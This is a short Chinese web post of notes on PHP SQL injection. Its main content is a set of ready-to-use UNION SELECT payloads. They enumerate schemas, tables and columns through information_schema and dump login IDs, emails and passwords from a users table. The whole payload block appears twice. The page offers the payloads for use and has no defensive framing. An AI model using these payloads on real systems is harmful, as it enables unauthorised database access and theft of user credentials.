php 注入 记录一下
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
暴库名\表名\列名
//union//select//unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch
ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1--
碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.
union+select+count(pasd)+from+users--
+union+select+concat(loginID,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+N,1--
或者冰的原点提供的
/union//select//unhex(hex(group_concat(loginID,0x3a,pasd)))+FROM+users--
//union//select//unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch
ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1--
碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.
union+select+count(pasd)+from+users--
+union+select+concat(loginID,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+N,1--
或者冰的原点提供的
/union//select//unhex(hex(group_concat(loginID,0x3a,pasd)))+FROM+users--
上一篇:速破解无线路由器密码的全过程
下一篇:phpcms2008 注入漏洞 利用分析
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座